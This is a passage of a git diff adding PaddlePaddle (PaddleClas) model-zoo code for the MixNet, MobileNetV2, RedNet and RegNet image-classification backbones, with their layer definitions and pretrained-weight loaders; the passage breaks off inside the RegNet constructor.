int + Conv1 kernel count for each unit. + conv2_kernel_counts : list of list of int + Conv2 kernel count for each unit. + exp_factors : list of list of int + Expansion factor for each unit. + se_factors : list of list of int + SE reduction factor for each unit. + in_channels : int, default 3 + Number of input channels. + in_size : tuple of two ints, default (224, 224) + Spatial size of the expected input image. + class_num : int, default 1000 + Number of classification classes. 
+ """ + + def __init__(self, + channels, + init_block_channels, + final_block_channels, + exp_kernel_counts, + conv1_kernel_counts, + conv2_kernel_counts, + exp_factors, + se_factors, + in_channels=3, + in_size=(224, 224), + class_num=1000): + super(MixNet, self).__init__() + self.in_size = in_size + self.class_num = class_num + + self.features = nn.Sequential() + self.features.add_sublayer( + "init_block", + MixInitBlock( + in_channels=in_channels, out_channels=init_block_channels)) + in_channels = init_block_channels + for i, channels_per_stage in enumerate(channels): + stage = nn.Sequential() + for j, out_channels in enumerate(channels_per_stage): + stride = 2 if ((j == 0) and (i != 3)) or ( + (j == len(channels_per_stage) // 2) and (i == 3)) else 1 + exp_kernel_count = exp_kernel_counts[i][j] + conv1_kernel_count = conv1_kernel_counts[i][j] + conv2_kernel_count = conv2_kernel_counts[i][j] + exp_factor = exp_factors[i][j] + se_factor = se_factors[i][j] + activation = "relu" if i == 0 else "swish" + stage.add_sublayer( + "unit{}".format(j + 1), + MixUnit( + in_channels=in_channels, + out_channels=out_channels, + stride=stride, + exp_kernel_count=exp_kernel_count, + conv1_kernel_count=conv1_kernel_count, + conv2_kernel_count=conv2_kernel_count, + exp_factor=exp_factor, + se_factor=se_factor, + activation=activation)) + in_channels = out_channels + self.features.add_sublayer("stage{}".format(i + 1), stage) + self.features.add_sublayer( + "final_block", + ConvBlock( + in_channels=in_channels, + out_channels=final_block_channels, + kernel_size=1, + stride=1, + padding=0, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU())) + in_channels = final_block_channels + self.features.add_sublayer( + "final_pool", nn.AvgPool2D( + kernel_size=7, stride=1)) + + self.output = nn.Linear( + in_features=in_channels, out_features=class_num) + + def forward(self, x): + x = self.features(x) + reshape_dim = reduce(lambda x, y: x * y, x.shape[1:]) + x = 
x.reshape(shape=[x.shape[0], reshape_dim]) + x = self.output(x) + return x + + +def get_mixnet(version, width_scale, model_name=None, **kwargs): + """ + Create MixNet model with specific parameters. + + Parameters: + ---------- + version : str + Version of MobileNetV3 ('s' or 'm'). + width_scale : float + Scale factor for width of layers. + model_name : str or None, default None + Model name. + """ + + if version == "s": + init_block_channels = 16 + channels = [[24, 24], [40, 40, 40, 40], [80, 80, 80], + [120, 120, 120, 200, 200, 200]] + exp_kernel_counts = [[2, 2], [1, 2, 2, 2], [1, 1, 1], + [2, 2, 2, 1, 1, 1]] + conv1_kernel_counts = [[1, 1], [3, 2, 2, 2], [3, 2, 2], + [3, 4, 4, 5, 4, 4]] + conv2_kernel_counts = [[2, 2], [1, 2, 2, 2], [2, 2, 2], + [2, 2, 2, 1, 2, 2]] + exp_factors = [[6, 3], [6, 6, 6, 6], [6, 6, 6], [6, 3, 3, 6, 6, 6]] + se_factors = [[0, 0], [2, 2, 2, 2], [4, 4, 4], [2, 2, 2, 2, 2, 2]] + elif version == "m": + init_block_channels = 24 + channels = [[32, 32], [40, 40, 40, 40], [80, 80, 80, 80], + [120, 120, 120, 120, 200, 200, 200, 200]] + exp_kernel_counts = [[2, 2], [1, 2, 2, 2], [1, 2, 2, 2], + [1, 2, 2, 2, 1, 1, 1, 1]] + conv1_kernel_counts = [[3, 1], [4, 2, 2, 2], [3, 4, 4, 4], + [1, 4, 4, 4, 4, 4, 4, 4]] + conv2_kernel_counts = [[2, 2], [1, 2, 2, 2], [1, 2, 2, 2], + [1, 2, 2, 2, 1, 2, 2, 2]] + exp_factors = [[6, 3], [6, 6, 6, 6], [6, 6, 6, 6], + [6, 3, 3, 3, 6, 6, 6, 6]] + se_factors = [[0, 0], [2, 2, 2, 2], [4, 4, 4, 4], + [2, 2, 2, 2, 2, 2, 2, 2]] + else: + raise ValueError("Unsupported MixNet version {}".format(version)) + + final_block_channels = 1536 + + if width_scale != 1.0: + channels = [[round_channels(cij * width_scale) for cij in ci] + for ci in channels] + init_block_channels = round_channels(init_block_channels * width_scale) + + net = MixNet( + channels=channels, + init_block_channels=init_block_channels, + final_block_channels=final_block_channels, + exp_kernel_counts=exp_kernel_counts, + 
conv1_kernel_counts=conv1_kernel_counts, + conv2_kernel_counts=conv2_kernel_counts, + exp_factors=exp_factors, + se_factors=se_factors, + **kwargs) + + return net + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def MixNet_S(pretrained=False, use_ssld=False, **kwargs): + """ + MixNet-S model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + """ + model = get_mixnet( + version="s", width_scale=1.0, model_name="MixNet_S", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MixNet_S"], use_ssld=use_ssld) + return model + + +def MixNet_M(pretrained=False, use_ssld=False, **kwargs): + """ + MixNet-M model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + """ + model = get_mixnet( + version="m", width_scale=1.0, model_name="MixNet_M", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MixNet_M"], use_ssld=use_ssld) + return model + + +def MixNet_L(pretrained=False, use_ssld=False, **kwargs): + """ + MixNet-S model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. 
+ """ + model = get_mixnet( + version="m", width_scale=1.3, model_name="MixNet_L", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MixNet_L"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mobilenet_v2.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mobilenet_v2.py new file mode 100644 index 0000000..b32c025 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mobilenet_v2.py @@ -0,0 +1,287 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MobileNetV2_x0_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x0_25_pretrained.pdparams", + "MobileNetV2_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x0_5_pretrained.pdparams", + "MobileNetV2_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x0_75_pretrained.pdparams", + "MobileNetV2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_pretrained.pdparams", + "MobileNetV2_x1_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x1_5_pretrained.pdparams", + "MobileNetV2_x2_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x2_0_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + filter_size, + num_filters, + stride, + padding, + channels=None, + num_groups=1, + name=None, + use_cudnn=True): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=num_groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + self._batch_norm = BatchNorm( + num_filters, + param_attr=ParamAttr(name=name + "_bn_scale"), + bias_attr=ParamAttr(name=name + "_bn_offset"), + moving_mean_name=name + "_bn_mean", + moving_variance_name=name + "_bn_variance") + + def forward(self, inputs, if_act=True): + y = 
self._conv(inputs) + y = self._batch_norm(y) + if if_act: + y = F.relu6(y) + return y + + +class InvertedResidualUnit(nn.Layer): + def __init__(self, num_channels, num_in_filter, num_filters, stride, + filter_size, padding, expansion_factor, name): + super(InvertedResidualUnit, self).__init__() + num_expfilter = int(round(num_in_filter * expansion_factor)) + self._expand_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=num_expfilter, + filter_size=1, + stride=1, + padding=0, + num_groups=1, + name=name + "_expand") + + self._bottleneck_conv = ConvBNLayer( + num_channels=num_expfilter, + num_filters=num_expfilter, + filter_size=filter_size, + stride=stride, + padding=padding, + num_groups=num_expfilter, + use_cudnn=False, + name=name + "_dwise") + + self._linear_conv = ConvBNLayer( + num_channels=num_expfilter, + num_filters=num_filters, + filter_size=1, + stride=1, + padding=0, + num_groups=1, + name=name + "_linear") + + def forward(self, inputs, ifshortcut): + y = self._expand_conv(inputs, if_act=True) + y = self._bottleneck_conv(y, if_act=True) + y = self._linear_conv(y, if_act=False) + if ifshortcut: + y = paddle.add(inputs, y) + return y + + +class InvresiBlocks(nn.Layer): + def __init__(self, in_c, t, c, n, s, name): + super(InvresiBlocks, self).__init__() + + self._first_block = InvertedResidualUnit( + num_channels=in_c, + num_in_filter=in_c, + num_filters=c, + stride=s, + filter_size=3, + padding=1, + expansion_factor=t, + name=name + "_1") + + self._block_list = [] + for i in range(1, n): + block = self.add_sublayer( + name + "_" + str(i + 1), + sublayer=InvertedResidualUnit( + num_channels=c, + num_in_filter=c, + num_filters=c, + stride=1, + filter_size=3, + padding=1, + expansion_factor=t, + name=name + "_" + str(i + 1))) + self._block_list.append(block) + + def forward(self, inputs): + y = self._first_block(inputs, ifshortcut=False) + for block in self._block_list: + y = block(y, ifshortcut=True) + return y + + +class MobileNet(nn.Layer): 
    def __init__(self, class_num=1000, scale=1.0, prefix_name=""):
        """MobileNetV2 backbone.

        Args:
            class_num (int): number of classification outputs.
            scale (float): width multiplier applied to every stage.
            prefix_name (str): optional prefix for parameter names.
        """
        super(MobileNet, self).__init__()
        self.scale = scale
        self.class_num = class_num

        # Inverted-residual settings, one tuple per stage:
        # (t = expansion factor, c = output channels, n = repeats,
        #  s = stride of the first block in the stage).
        bottleneck_params_list = [
            (1, 16, 1, 1),
            (6, 24, 2, 2),
            (6, 32, 3, 2),
            (6, 64, 4, 2),
            (6, 96, 3, 1),
            (6, 160, 3, 2),
            (6, 320, 1, 1),
        ]

        # Stem: 3x3 stride-2 conv.
        self.conv1 = ConvBNLayer(
            num_channels=3,
            num_filters=int(32 * scale),
            filter_size=3,
            stride=2,
            padding=1,
            name=prefix_name + "conv1_1")

        self.block_list = []
        i = 1
        in_c = int(32 * scale)
        for layer_setting in bottleneck_params_list:
            t, c, n, s = layer_setting
            i += 1
            block = self.add_sublayer(
                prefix_name + "conv" + str(i),
                sublayer=InvresiBlocks(
                    in_c=in_c,
                    t=t,
                    c=int(c * scale),
                    n=n,
                    s=s,
                    name=prefix_name + "conv" + str(i)))
            self.block_list.append(block)
            in_c = int(c * scale)

        # The final 1x1 conv never shrinks below 1280 channels, matching
        # the original MobileNetV2 design.
        self.out_c = int(1280 * scale) if scale > 1.0 else 1280
        self.conv9 = ConvBNLayer(
            num_channels=in_c,
            num_filters=self.out_c,
            filter_size=1,
            stride=1,
            padding=0,
            name=prefix_name + "conv9")

        self.pool2d_avg = AdaptiveAvgPool2D(1)

        self.out = Linear(
            self.out_c,
            class_num,
            weight_attr=ParamAttr(name=prefix_name + "fc10_weights"),
            bias_attr=ParamAttr(name=prefix_name + "fc10_offset"))

    def forward(self, inputs):
        # Stem -> inverted-residual stages -> 1x1 conv -> GAP -> FC logits.
        y = self.conv1(inputs, if_act=True)
        for block in self.block_list:
            y = block(y)
        y = self.conv9(y, if_act=True)
        y = self.pool2d_avg(y)
        y = paddle.flatten(y, start_axis=1, stop_axis=-1)
        y = self.out(y)
        return y


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Optionally load pretrained weights: False = skip, True = download
    from ``model_url``, str = load from a local file path."""
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def MobileNetV2_x0_25(pretrained=False, use_ssld=False, **kwargs):
    # MobileNetV2 with a 0.25 width multiplier.
    model = MobileNet(scale=0.25, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["MobileNetV2_x0_25"], use_ssld=use_ssld)
    return model


def MobileNetV2_x0_5(pretrained=False, use_ssld=False, **kwargs):
    # MobileNetV2 with a 0.5 width multiplier.
    model = MobileNet(scale=0.5, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["MobileNetV2_x0_5"], use_ssld=use_ssld)
    return model


def MobileNetV2_x0_75(pretrained=False, use_ssld=False, **kwargs):
    # MobileNetV2 with a 0.75 width multiplier.
    model = MobileNet(scale=0.75, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["MobileNetV2_x0_75"], use_ssld=use_ssld)
    return model


def MobileNetV2(pretrained=False, use_ssld=False, **kwargs):
    # Standard MobileNetV2 (width multiplier 1.0).
    model = MobileNet(scale=1.0, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["MobileNetV2"], use_ssld=use_ssld)
    return model


def MobileNetV2_x1_5(pretrained=False, use_ssld=False, **kwargs):
    # MobileNetV2 with a 1.5 width multiplier.
    model = MobileNet(scale=1.5, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["MobileNetV2_x1_5"], use_ssld=use_ssld)
    return model


def MobileNetV2_x2_0(pretrained=False, use_ssld=False, **kwargs):
    # MobileNetV2 with a 2.0 width multiplier.
    model = MobileNet(scale=2.0, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["MobileNetV2_x2_0"], use_ssld=use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rednet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rednet.py
new file mode 100644
index 0000000..12802d5
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rednet.py
@@ -0,0 +1,201 @@
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import paddle
import paddle.nn as nn

from paddle.vision.models import resnet

from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

# Download locations of the officially released pretrained checkpoints.
MODEL_URLS = {
    "RedNet26":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet26_pretrained.pdparams",
    "RedNet38":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet38_pretrained.pdparams",
    "RedNet50":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet50_pretrained.pdparams",
    "RedNet101":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet101_pretrained.pdparams",
    "RedNet152":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet152_pretrained.pdparams"
}

# NOTE(review): sibling model files export list(MODEL_URLS.keys()); here the
# dict view itself is exported, which iterates identically.
__all__ = MODEL_URLS.keys()


class Involution(nn.Layer):
    """Involution operator: a per-position, channel-shared spatial kernel
    is generated from the input feature map itself and applied to the
    unfolded kernel_size x kernel_size neighborhood of each position.
    """

    def __init__(self, channels, kernel_size, stride):
        super(Involution, self).__init__()
        self.kernel_size = kernel_size
        self.stride = stride
        self.channels = channels
        reduction_ratio = 4
        # Channels are partitioned into groups of 16; all channels within a
        # group share the same generated spatial kernel.
        self.group_channels = 16
        self.groups = self.channels // self.group_channels
        # Kernel-generation bottleneck: 1x1 reduce -> BN -> ReLU.
        self.conv1 = nn.Sequential(
            ('conv', nn.Conv2D(
                in_channels=channels,
                out_channels=channels // reduction_ratio,
                kernel_size=1,
                bias_attr=False)),
            ('bn', nn.BatchNorm2D(channels // reduction_ratio)),
            ('activate', nn.ReLU()))
        # 1x1 expand to kernel_size^2 weights per group per position.
        self.conv2 = nn.Sequential(('conv', nn.Conv2D(
            in_channels=channels // reduction_ratio,
            out_channels=kernel_size**2 * self.groups,
            kernel_size=1,
            stride=1)))
        if stride > 1:
            # When striding, kernels are generated at the downsampled
            # (output) resolution.
            self.avgpool = nn.AvgPool2D(stride, stride)

    def forward(self, x):
        # weight: (b, groups * k^2, h, w) -- one k*k kernel per group and
        # output position.
        weight = self.conv2(
            self.conv1(x if self.stride == 1 else self.avgpool(x)))
        b, c, h, w = weight.shape
        # -> (b, groups, 1, k^2, h, w) so it broadcasts over group_channels.
        weight = weight.reshape(
            (b, self.groups, self.kernel_size**2, h, w)).unsqueeze(2)

        # Unfold k*k neighborhoods with 'same' padding, then apply the
        # generated kernels and sum over the kernel axis.
        out = nn.functional.unfold(x, self.kernel_size, self.stride,
                                   (self.kernel_size - 1) // 2, 1)
        out = out.reshape(
            (b, self.groups, self.group_channels, self.kernel_size**2, h, w))
        out = (weight * out).sum(axis=3).reshape((b, self.channels, h, w))
        return out


class BottleneckBlock(resnet.BottleneckBlock):
    """ResNet bottleneck whose middle 3x3 convolution is replaced by a
    7x7 involution; every other sublayer is inherited from the
    paddle.vision ResNet bottleneck."""

    def __init__(self,
                 inplanes,
                 planes,
                 stride=1,
                 downsample=None,
                 groups=1,
                 base_width=64,
                 dilation=1,
                 norm_layer=None):
        super(BottleneckBlock, self).__init__(inplanes, planes, stride,
                                              downsample, groups, base_width,
                                              dilation, norm_layer)
        width = int(planes * (base_width / 64.)) * groups
        # Swap in a 7x7 involution for the parent's conv2.
        self.conv2 = Involution(width, 7, stride)


class RedNet(resnet.ResNet):
    """RedNet backbone: a ResNet with the stem and the bottleneck 3x3
    convolutions replaced by involutions."""

    def __init__(self, block, depth, class_num=1000, with_pool=True):
        # Build a ResNet-50 skeleton first; the depth-dependent layers are
        # re-created below, so passing depth=50 here is intentional.
        super(RedNet, self).__init__(
            block=block, depth=50, num_classes=class_num, with_pool=with_pool)
        # Blocks per stage for each supported depth.
        layer_cfg = {
            26: [1, 2, 4, 1],
            38: [2, 3, 5, 2],
            50: [3, 4, 6, 3],
            101: [3, 4, 23, 3],
            152: [3, 8, 36, 3]
        }
        layers = layer_cfg[depth]

        # Drop the parent's 7x7-conv stem; it is replaced by `self.stem`.
        self.conv1 = None
        self.bn1 = None
        self.relu = None
        self.inplanes = 64
        self.class_num = class_num
        # New stem: 3x3 stride-2 conv -> 3x3 involution -> 3x3 conv.
        self.stem = nn.Sequential(
            nn.Sequential(
                ('conv', nn.Conv2D(
                    in_channels=3,
                    out_channels=self.inplanes // 2,
                    kernel_size=3,
                    stride=2,
                    padding=1,
                    bias_attr=False)),
                ('bn', nn.BatchNorm2D(self.inplanes // 2)),
                ('activate', nn.ReLU())),
            Involution(self.inplanes // 2, 3, 1),
            nn.BatchNorm2D(self.inplanes // 2),
            nn.ReLU(),
            nn.Sequential(
                ('conv', nn.Conv2D(
                    in_channels=self.inplanes // 2,
                    out_channels=self.inplanes,
                    kernel_size=3,
                    stride=1,
                    padding=1,
                    bias_attr=False)), ('bn', nn.BatchNorm2D(self.inplanes)),
                ('activate', nn.ReLU())))

        # Rebuild the four stages with the involution bottleneck block.
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)

    def forward(self, x):
        # Stem -> maxpool -> 4 stages -> (optional) GAP -> (optional) FC.
        x = self.stem(x)
        x = self.maxpool(x)

        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)

        if self.with_pool:
            x = self.avgpool(x)

        if self.class_num > 0:
            x = paddle.flatten(x, 1)
            x = self.fc(x)

        return x


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Optionally load pretrained weights: False = skip, True = download
    from ``model_url``, str = load from a local file path."""
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def RedNet26(pretrained=False, **kwargs):
    model = RedNet(BottleneckBlock, 26, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["RedNet26"])
    return model


def RedNet38(pretrained=False, **kwargs):
    model = RedNet(BottleneckBlock, 38, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["RedNet38"])
    return model


def RedNet50(pretrained=False, **kwargs):
    model = RedNet(BottleneckBlock, 50, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["RedNet50"])
    return model


def RedNet101(pretrained=False, **kwargs):
    model = RedNet(BottleneckBlock, 101, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["RedNet101"])
    return model


def RedNet152(pretrained=False, **kwargs):
    model = RedNet(BottleneckBlock, 152, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["RedNet152"])
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/regnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/regnet.py
new file mode 100644
index 0000000..549bd16
--- /dev/null
+++ 
b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/regnet.py @@ -0,0 +1,429 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "RegNetX_200MF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetX_200MF_pretrained.pdparams", + "RegNetX_4GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetX_4GF_pretrained.pdparams", + "RegNetX_32GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetX_32GF_pretrained.pdparams", + "RegNetY_200MF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetY_200MF_pretrained.pdparams", + "RegNetY_4GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetY_4GF_pretrained.pdparams", + "RegNetY_32GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetY_32GF_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +def quantize_float(f, q): + """Converts 
a float to closest non-zero int divisible by q.""" + return int(round(f / q) * q) + + +def adjust_ws_gs_comp(ws, bms, gs): + """Adjusts the compatibility of widths and groups.""" + ws_bot = [int(w * b) for w, b in zip(ws, bms)] + gs = [min(g, w_bot) for g, w_bot in zip(gs, ws_bot)] + ws_bot = [quantize_float(w_bot, g) for w_bot, g in zip(ws_bot, gs)] + ws = [int(w_bot / b) for w_bot, b in zip(ws_bot, bms)] + return ws, gs + + +def get_stages_from_blocks(ws, rs): + """Gets ws/ds of network at each stage from per block values.""" + ts = [ + w != wp or r != rp + for w, wp, r, rp in zip(ws + [0], [0] + ws, rs + [0], [0] + rs) + ] + s_ws = [w for w, t in zip(ws, ts[:-1]) if t] + s_ds = np.diff([d for d, t in zip(range(len(ts)), ts) if t]).tolist() + return s_ws, s_ds + + +def generate_regnet(w_a, w_0, w_m, d, q=8): + """Generates per block ws from RegNet parameters.""" + assert w_a >= 0 and w_0 > 0 and w_m > 1 and w_0 % q == 0 + ws_cont = np.arange(d) * w_a + w_0 + ks = np.round(np.log(ws_cont / w_0) / np.log(w_m)) + ws = w_0 * np.power(w_m, ks) + ws = np.round(np.divide(ws, q)) * q + num_stages, max_stage = len(np.unique(ws)), ks.max() + 1 + ws, ws_cont = ws.astype(int).tolist(), ws_cont.tolist() + return ws, num_stages, max_stage, ws_cont + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + padding=0, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=groups, + weight_attr=ParamAttr(name=name + ".conv2d.output.1.w_0"), + bias_attr=ParamAttr(name=name + ".conv2d.output.1.b_0")) + bn_name = name + "_bn" + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + ".output.1.w_0"), + bias_attr=ParamAttr(bn_name + ".output.1.b_0"), + moving_mean_name=bn_name + "_mean", + moving_variance_name=bn_name + 
"_variance") + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + bm, + gw, + se_on, + se_r, + shortcut=True, + name=None): + super(BottleneckBlock, self).__init__() + + # Compute the bottleneck width + w_b = int(round(num_filters * bm)) + # Compute the number of groups + num_gs = w_b // gw + self.se_on = se_on + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=w_b, + filter_size=1, + padding=0, + act="relu", + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=w_b, + num_filters=w_b, + filter_size=3, + stride=stride, + padding=1, + groups=num_gs, + act="relu", + name=name + "_branch2b") + if se_on: + w_se = int(round(num_channels * se_r)) + self.se_block = SELayer( + num_channels=w_b, + num_filters=w_b, + reduction_ratio=w_se, + name=name + "_branch2se") + self.conv2 = ConvBNLayer( + num_channels=w_b, + num_filters=num_filters, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + if self.se_on: + conv1 = self.se_block(conv1) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class SELayer(nn.Layer): + def __init__(self, num_channels, num_filters, reduction_ratio, name=None): + super(SELayer, self).__init__() + + self.pool2d_gap = AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), 
name=name + "_sqz_weights"), + bias_attr=ParamAttr(name=name + "_sqz_offset")) + + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_filters, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_exc_weights"), + bias_attr=ParamAttr(name=name + "_exc_offset")) + + def forward(self, input): + pool = self.pool2d_gap(input) + pool = paddle.reshape(pool, shape=[-1, self._num_channels]) + squeeze = self.squeeze(pool) + squeeze = F.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = F.sigmoid(excitation) + excitation = paddle.reshape( + excitation, shape=[-1, self._num_channels, 1, 1]) + out = input * excitation + return out + + +class RegNet(nn.Layer): + def __init__(self, + w_a, + w_0, + w_m, + d, + group_w, + bot_mul, + q=8, + se_on=False, + class_num=1000): + super(RegNet, self).__init__() + + # Generate RegNet ws per block + b_ws, num_s, max_s, ws_cont = generate_regnet(w_a, w_0, w_m, d, q) + # Convert to per stage format + ws, ds = get_stages_from_blocks(b_ws, b_ws) + # Generate group widths and bot muls + gws = [group_w for _ in range(num_s)] + bms = [bot_mul for _ in range(num_s)] + # Adjust the compatibility of ws and gws + ws, gws = adjust_ws_gs_comp(ws, bms, gws) + # Use the same stride for each stage + ss = [2 for _ in range(num_s)] + # Use SE for RegNetY + se_r = 0.25 + # Construct the model + # Group params by stage + stage_params = list(zip(ds, ws, ss, bms, gws)) + # Construct the stem + 